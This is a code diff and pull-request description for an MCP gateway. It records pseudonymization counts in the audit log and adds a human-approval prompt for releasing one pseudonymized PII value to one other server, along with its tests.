+            origins: &entry.origins,
+        })
     }
 
     /// Turn tokens back into the values they stand for, for a call to `target`.
@@ -1051,6 +1105,64 @@ mod tests {
         assert_eq!(
             args["body"]["fields"][0], "⟦EMAIL_1⟧",
             "the token must survive so a dispatched copy could never carry the value"
+        );
+    }
+
+    #[test]
+    fn an_approval_releases_exactly_one_value_to_exactly_one_server() {
+        // SBS-696: the remedy for the SBS-605 refusal. It has to be narrow enough that it
+        // cannot be turned back into the blanket grant that refusal exists to prevent.
+        let mut m = map();
+        m.pseudonymize("crm", "ada@example.com and bob@example.com");
+
+        assert!(m.approve_origin("⟦EMAIL_1⟧", "mailer"));
+
+        // The approved value now resolves for the approved server...
+        let out = m.rehydrate("mailer", "⟦EMAIL_1⟧");
+        assert_eq!(out.text, "ada@example.com");
+        assert!(out.refused.is_empty());
+
+        // ...and nothing else moved. Not the other value the same server minted,
+        let other = m.rehydrate("mailer", "⟦EMAIL_2⟧");
+        assert_eq!(other.text, "⟦EMAIL_2⟧", "approval is per value");
+        assert_eq!(other.refused, BTreeSet::from(["⟦EMAIL_2⟧".to_string()]));
+        // nor the same value for a third server.
+        let elsewhere = m.rehydrate("evil-fetch", "⟦EMAIL_1⟧");
+        assert_eq!(elsewhere.text, "⟦EMAIL_1⟧", "approval is per destination");
+        assert_eq!(elsewhere.refused, BTreeSet::from(["⟦EMAIL_1⟧".to_string()]));
+
+        // The minting server keeps its own access.
+        assert_eq!(m.rehydrate("crm", "⟦EMAIL_1⟧").text, "ada@example.com");
+    }
+
+    #[test]
+    fn approving_an_unknown_token_grants_nothing_and_mints_nothing() {
+        // A token the model invented has no value behind it. Creating an entry here would
+        // let a caller manufacture origins for something this map never saw.
+        let mut m = map();
+        m.pseudonymize("crm", "ada@example.com");
+        let before = m.len();
+
+        assert!(!m.approve_origin("⟦EMAIL_9⟧", "mailer"));
+
+        assert_eq!(m.len(), before, "no entry may be minted by an approval");
+        assert!(m.disclose("⟦EMAIL_9⟧").is_none());
+    }
+
+    #[test]
+    fn disclose_names_the_value_and_who_already_holds_it() {
+        // The approval prompt needs both: which value is being released, and whether the
+        // destination is somewhere it has already been.
+        let mut m = map();
+        m.pseudonymize("crm", "ada@example.com");
+        m.pseudonymize("billing", "ada@example.com");
+
+        let d = m.disclose("⟦EMAIL_1⟧").expect("a minted token discloses");
+        assert_eq!(d.value, "ada@example.com");
+        assert_eq!(
+            d.origins.iter().cloned().collect::<Vec<_>>(),
+            vec!["billing".to_string(), "crm".to_string()],
+            "every server that produced it, so the approver sees where it has been"
         );
     }
 

--- a/src/components/ActivityView.test.tsx
+++ b/src/components/ActivityView.test.tsx
@@ -82,6 +82,46 @@ describe("ActivityView recent calls", () => {
     expect(screen.getByText("list_issues")).toBeInTheDocument();
     expect(screen.getByText("403: token lacks repo scope")).toBeInTheDocument();
   });
+
+  it("shows the pseudonymization count, and flags a pass that did not fully apply", async () => {
+    const user = userEvent.setup({
+      advanceTimers: (ms) => vi.advanceTimersByTime(ms),
+    });
+    getAuditLog.mockResolvedValue([
+      entry({ tool: "redacted_call", piiReplaced: 3 }),
+      entry({
+        ts: 1700000003000,
+        tool: "leaky_call",
+        piiReplaced: 2,
+        piiIncomplete: true,
+      }),
+      entry({ ts: 1700000004000, tool: "matched_nothing", piiReplaced: 0 }),
+      entry({ ts: 1700000005000, tool: "redaction_off" }),
+    ]);
+    render(<ActivityView refreshKey={0} registry={null} />);
+
+    await act(async () => {});
+    await user.click(screen.getByRole("button", { name: /recent calls/i }));
+
+    expect(screen.getByText("3 pseudonymized")).toBeInTheDocument();
+
+    // The fail-open case has to read as a warning, not as a tidy count: values reached
+    // the model in the clear even though redaction was on.
+    const incomplete = screen.getByText("2 pseudonymized, incomplete");
+    expect(incomplete).toBeInTheDocument();
+    expect(incomplete).toHaveAttribute(
+      "title",
+      expect.stringContaining("did not fully apply"),
+    );
+
+    // A pass that matched nothing, and a call made with redaction off, both stay silent —
+    // a badge on every row would bury the two cases above.
+    expect(screen.queryByText(/0 pseudonymized/)).not.toBeInTheDocument();
+    expect(screen.getAllByText(/pseudonymized/)).toHaveLength(2);
+
+    // The values are the point of the feature and must never reach this view.
+    expect(document.body.textContent).not.toMatch(/@example\.com/);
+  });
 });
 
 describe("ActivityView discovery", () => {

--- a/src/components/ActivityView.tsx
+++ b/src/components/ActivityView.tsx
@@ -612,6 +612,46 @@ function ServerRow({ s }: { s: ServerStat }) {
 /** One recent-call row. A failed call with a captured error message expands to
  * show why it failed; latency is shown inline. Args/results aren't recorded in
  * the audit log (it's an append-only governance record), so they're not shown. */
+/** What the PII pass did on this call: a count, and a warning when it did not fully
+ * apply (SBS-607).
+ *
+ * Renders nothing when redaction was off (no `piiReplaced`) AND when it ran but matched
+ * nothing. The audit record keeps those two apart, and the export still does; the row
+ * does not, because a badge on every call of a busy log is noise that buries the two
+ * cases worth looking at. Whether the feature is on is a setting the user set; whether it
+ * did something, or quietly failed to, is what a per-call row can tell them.
+ *
+ * The count is the whole payload. Pseudonymization exists to keep values away from the
+ * model, so surfacing one here to explain the count would defeat it. */
+function PiiBadge({ entry }: { entry: AuditEntry }) {
+  const replaced = entry.piiReplaced;
+  if (replaced === undefined) return null;
+  // Redaction fails OPEN: a full session map or an over-cap result leaves values in the
+  // clear. That case gets warning styling because the honest reading of the row is "some
+  // of this reached the model unredacted", not "N were handled".
+  if (entry.piiIncomplete) {
+    return (
+      <span
+        className="flex shrink-0 items-center gap-1 rounded bg-warning/15 px-1.5 py-0.5 text-[10px] text-warning"
+        title={`${replaced} value${replaced === 1 ? "" : "s"} pseudonymized, but the pass did not fully apply — some values reached the model in the clear (the session map was full, or the result exceeded the scan cap).`}
+      >
+        <ShieldAlert aria-hidden="true" className="size-3" />
+        {replaced} pseudonymized, incomplete
+      </span>
+    );
+  }
+  if (replaced === 0) return null;
+  return (
+    <span
+      className="flex shrink-0 items-center gap-1 rounded bg-muted px-1.5 py-0.5 text-[10px] text-muted-foreground"
+      title={`${replaced} value${replaced === 1 ? "" : "s"} in this result were replaced with pseudonyms before the model saw them. The values themselves are never logged.`}
+    >
+      <ShieldCheck aria-hidden="true" className="size-3" />
+      {replaced} pseudonymized
+    </span>
+  );
+}
+
 function CallRow({ e }: { e: AuditEntry }) {
   const [open, setOpen] = useState(false);
   const hasDetail = !e.ok && !!e.error;
@@ -665,6 +705,7 @@ function CallRow({ e }: { e: AuditEntry }) {
             {e.client}
           </span>
         )}
+        <PiiBadge entry={e} />
         <span className="ml-auto shrink-0 text-xs tabular-nums text-muted-foreground">
           {fmtMs(e.durationMs ?? e.heldMs ?? null)}
         </span>

--- a/src/components/PendingApprovals.test.tsx
+++ b/src/components/PendingApprovals.test.tsx
@@ -1,0 +1,92 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
+import { render, screen, act } from "@testing-library/react";
+import { PendingApprovals } from "./PendingApprovals";
+import type { PendingApproval } from "@/lib/types";
+
+const listPendingApprovals = vi.fn();
+const decideApproval = vi.fn();
+
+vi.mock("@/lib/api", () => ({
+  listPendingApprovals: () => listPendingApprovals(),
+  decideApproval: (...a: unknown[]) => decideApproval(...a),
+}));
+
+vi.mock("@tauri-apps/api/event", () => ({
+  listen: vi.fn(() => Promise.resolve(() => {})),
+}));
+
+vi.mock("@/lib/openUrl", () => ({ openExternal: vi.fn() }));
+vi.mock("@/lib/toast", () => ({ toastError: vi.fn() }));
+
+function approval(over: Partial<PendingApproval> = {}): PendingApproval {
+  return {
+    id: "req-1",
+    client: null,
+    server: "mailer",
+    tool: "mailer__send",
+    reason: "destructive",
+    arguments: { to: "⟦EMAIL_1⟧" },
+    deadlineMs: Date.now() + 120_000,
+    ...over,
+  };
+}
+
+const release = approval({
+  reason: "pii_cross_server",
+  piiRelease: {
+    server: "mailer",
+    values: [
+      {
+        token: "⟦EMAIL_1⟧",
+        value: "ada@example.com",
+        origins: ["crm"],
+      },
+    ],
+  },
+});
+
+beforeEach(() => {
+  listPendingApprovals.mockResolvedValue([]);
+});
+
+afterEach(() => {
+  vi.clearAllMocks();
+});
+
+describe("PendingApprovals PII release", () => {
+  it("names the value, its origin, and the destination it has never reached", async () => {
+    // SBS-696: a person cannot judge this release without seeing what is being released
+    // and where it came from. This window is the only place the real value appears.
+    listPendingApprovals.mockResolvedValue([release]);
+    render(<PendingApprovals />);
+    await act(async () => {});
+
+    expect(screen.getByText("ada@example.com")).toBeInTheDocument();
+    expect(screen.getByText(/from crm/)).toBeInTheDocument();
+    expect(screen.getByText(/Would send to mailer/)).toBeInTheDocument();
+    expect(screen.getByText("Releases private data")).toBeInTheDocument();
+  });
+
+  it("never offers to skip the prompt for a release", async () => {
+    // The allow key binds a TOOL DEFINITION, and the broker refuses to auto-approve a
+    // release on one. Offering the shortcut here would promise a bypass that never fires
+    // — and if it ever did fire, it would be the blanket grant this feature exists to
+    // avoid.
+    listPendingApprovals.mockResolvedValue([release]);
+    render(<PendingApprovals />);
+    await act(async () => {});
+
+    expect(screen.queryByText("Skip next time?")).not.toBeInTheDocument();
+    expect(screen.queryByText("Allow for this session")).not.toBeInTheDocument();
+  });
+
+  it("still offers the skip shortcut for an ordinary tool approval", async () => {
+    // Guard the premise of the test above: the shortcut is hidden because of the release,
+    // not because it never renders.
+    listPendingApprovals.mockResolvedValue([approval()]);
+    render(<PendingApprovals />);
+    await act(async () => {});
+
+    expect(screen.getByText("Skip next time?")).toBeInTheDocument();
+  });
+});

--- a/src/components/PendingApprovals.tsx
+++ b/src/components/PendingApprovals.tsx
@@ -32,6 +32,11 @@ const REASON: Record<Reason, { label: string; className: string; Icon: typeof Tr
       className: "bg-destructive/10 text-destructive",
       Icon: Trash2,
     },
+    pii_cross_server: {
+      label: "Releases private data",
+      className: "bg-destructive/10 text-destructive",
+      Icon: ShieldAlert,
+    },
   };
 
 /**
@@ -167,6 +172,7 @@ export function PendingApprovals() {
           {pending.map((a) => {
             const reason = REASON[a.reason];
             const urlElicitation = a.urlElicitation;
+            const piiRelease = a.piiRelease;
             // Count down to the broker's authoritative deadline; fall back to
             // first-sighting + timeout only if deadlineMs is somehow absent, so the
             // timer is never blank.
@@ -220,6 +226,36 @@ export function PendingApprovals() {
                     </Badge>
                   )}
                 </div>
+
+                {/* The release decision itself. Shown above the arguments because the
+                    question is "may these values go to this server?", not "is this call
+                    shaped correctly?". These are the real values, un-pseudonymized: this
+                    window is the only place they appear, and the model never sees them. */}
+                {piiRelease && (
+                  <div className="mb-3">
+                    <div className="mb-1 text-[0.7rem] font-medium uppercase tracking-wide text-muted-foreground">
+                      Would send to {piiRelease.server}
+                    </div>
+                    <ul className="divide-y divide-border/60 rounded-md border border-destructive/40 bg-destructive/5">
+                      {piiRelease.values.map((v) => (
+                        <li key={v.token} className="p-2.5 text-xs">
+                          <div className="font-mono break-all text-foreground">
+                            {v.value}
+                          </div>
+                          <div className="mt-0.5 text-muted-foreground">
+                            {v.token} · from {v.origins.join(", ")}
+                          </div>
+                        </li>
+                      ))}
+                    </ul>
+                    <p className="mt-1.5 text-xs text-muted-foreground">
+                      {piiRelease.server} has never seen{" "}
+                      {piiRelease.values.length === 1 ? "this value" : "these values"}.
+                      Approving releases {piiRelease.values.length === 1 ? "it" : "them"}{" "}
+                      to that server for the rest of this session, and nothing else.
+                    </p>
+                  </div>
+                )}
 
                 <div className="mb-3">
                   <div className="mb-1 text-[0.7rem] font-medium uppercase tracking-wide text-muted-foreground">
@@ -290,8 +326,11 @@ export function PendingApprovals() {
                   </div>
                 </div>
 
-                {/* Skip the prompt for this tool next time - curbs approval fatigue. */}
-                {!urlElicitation && (
+                {/* Skip the prompt for this tool next time - curbs approval fatigue.
+                    Never offered for a PII release: the allow key binds a tool definition,
+                    and the broker deliberately refuses to auto-approve a release on one
+                    (SBS-696). Offering it here would promise a bypass that never fires. */}
+                {!urlElicitation && !piiRelease && (
                   <div className="mt-2 flex flex-wrap items-center gap-x-2.5 gap-y-1 text-xs text-muted-foreground">
                     <span>Skip next time?</span>
                     <button

--- a/src/lib/types.ts
+++ b/src/lib/types.ts
@@ -73,6 +73,14 @@ export interface AuditEntry {
   /** The registered HTTP client that made the call, when known. Absent for the
    * local desktop client and legacy/open tokens. */
   client?: string;
+  /** How many values this call's result had pseudonymized. Absent when PII redaction was
+   * off for the call — which is deliberately distinct from `0` ("it ran, found nothing").
+   * A count only; the values themselves never enter the audit log. */
+  piiReplaced?: number;
+  /** Present (and always `true`) when the pass left values in the clear: the session map
+   * hit its cap, or the result exceeded the scan cap. Pseudonymization fails OPEN by
+   * design, so this is the case the row most needs to show. */
+  piiIncomplete?: boolean;
 }
 
 /** One live-inspection capture: a tool call's request args and response, plus timing.

--- a/src/lib/types.ts
+++ b/src/lib/types.ts
@@ -372,7 +372,8 @@ export interface PendingApproval {
   server: string;
   tool: string;
   toolFingerprint?: string | null;
-  reason: "destructive" | "untrusted_source" | "destructive_and_untrusted";
+  reason:
+    "destructive" | "untrusted_source" | "destructive_and_untrusted" | "pii_cross_server";
   arguments: unknown;
   /** A screened URL-mode elicitation brokered by the desktop because the MCP host
    * did not declare URL elicitation support. */
@@ -380,6 +381,16 @@ export interface PendingApproval {
     url: string;
     origin: string;
     message: string;
+  } | null;
+  /** Pseudonymized values this call would send to a server that never produced them.
+   * Present only for `reason: "pii_cross_server"`.
+   *
+   * `value` is REAL, un-pseudonymized PII. It reaches this window and nowhere else —
+   * a person cannot judge the release without seeing what is being released. It must
+   * never be logged, persisted, or echoed anywhere the model can read. */
+  piiRelease?: {
+    server: string;
+    values: { token: string; value: string; origins: string[] }[];
   } | null;
   /** Wall-clock epoch-ms when this call auto-denies; the overlay counts down to it. */
   deadlineMs: number;


### PR DESCRIPTION
Closes out the two follow-ups left by SBS-346's v1: you can now see what PII redaction did on a given call, and unblock the one legitimate workflow SBS-605 dead-ended.

## SBS-607 — record and surface the pseudonymization count

`pseudonymize_if_enabled` already computed how many values it replaced and whether the pass fully applied. All three call sites discarded both, so nothing reached the audit log, the CSV export, or Activity.

That mattered more than a missing stat, because this path **fails open**: a full session map or an over-cap result silently leaves values in the clear, and the only trace was an `eprintln!`. A call where redaction quietly did not apply was indistinguishable from a clean one.

- `audit::PiiPass` carries the count and the `complete` flag. `timed_entry` is split out pure so the record's shape is testable, matching the existing `decision_entry` precedent.
- `defend_and_shape` returns `Defended { result, pii }` so the pass reaches the audit record its *caller* writes. The downstream-error path now defends before auditing, so a failed call records its pass too.
- `piiReplaced` is **absent** when redaction was off and **present-and-zero** when it ran and matched nothing — those are different facts. `piiIncomplete` is written only when true, so the fail-open case is greppable in the log.
- CSV columns are appended at the **end**, so a consumer reading the governance export positionally keeps working.
- Activity shows "N pseudonymized", and a warning badge when the pass did not fully apply. Counts only — the values never leave the session map.

## SBS-696 — a human can release one value to one server

SBS-605 scoped rehydration to the minting server, closing the cross-server exfiltration channel. It also left "read a customer from a CRM, then mail them via a different server" with no path at all: the call just failed. The refusal was the only outcome. It is now the *default* outcome, with an explicit human decision as the remedy.

- `SessionMap::approve_origin` adds one server to one value's origins; `disclose` hands the real value to the prompt that asks about it. There is deliberately **no blanket per-server grant** — that would rebuild the channel SBS-605 closed. An unknown token grants nothing and mints nothing, so a token the model invented cannot manufacture an origin.
- On a refusal the dispatch path asks the local broker, naming the destination, each token, its real value, and the servers that already hold it. On approval it re-runs the pass from the **original** arguments and dispatches.
- **Headless fails closed.** `request_human_decision` returns `Unreachable` with no broker, so a gateway with nobody to ask refuses exactly as before, and no non-approval outcome ever widens the map.
- The request carries **no tool fingerprint**, and the broker's `preflight` refuses to auto-approve a release, so an existing "always allow" on a tool can never release a later value. The UI hides the skip-next-time shortcut for the same reason — offering it would promise a bypass that never fires.
- The MRTR retry leg gets the same ask. That is exactly where a user has just typed the address an elicitation requested, so leaving it a dead end would defeat the point.
- Audited via `record_decision` under reason `pii_cross_server`, which hashes the arguments rather than storing them: the released values never reach the log.

Real values reach the loopback broker window and nowhere else. That is the one audience which already sees real arguments before dispatch, and it is the only way a person can judge what they are releasing.

## Verification

- Rust: 882 lib + 261 gateway + integration tests, 0 failures. Clippy clean.
- Frontend: 246 tests across 27 files. `tsc` and prettier clean.
- Every new test was proven load-bearing by mutation: `approve_origin` made a no-op, the `pii_release` guard dropped from `preflight`, `complete` forced true, the `piiIncomplete` write removed, denials treated as approvals, and the skip shortcut un-hidden — each turned the corresponding test red, then reverted.
- No net `rustfmt` drift. The repo is broadly unformatted (hundreds of pre-existing diffs, plus a `docs/no-cargo-fmt` branch), so this was checked file-by-file against the pre-change baseline rather than by running `cargo fmt`.

## Notes for review

- **The spec SBS-607 cites does not exist.** `docs/specs/pii-pseudonymization.md` has never been committed on any branch — same for `docs/drafts/cloudflare-gap-analysis.md` referenced by SBS-346. Behaviour here is derived from the `pii.rs` module docs instead. Worth landing those documents, since two issues now treat them as ground truth.
- **Deliberately out of scope:** the per-server PII override and the Teams `forcePiiRedaction` UI that SBS-607 mentions in passing. Different surfaces; they would roughly double this diff. Worth a follow-up under SBS-346.
- The resource and prompt paths call `pseudonymize_if_enabled` but write no audit row at all (they are not tool calls), so their pass is still only logged. Adding rows there would change what Activity's error rate is computed over, so it was left alone.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
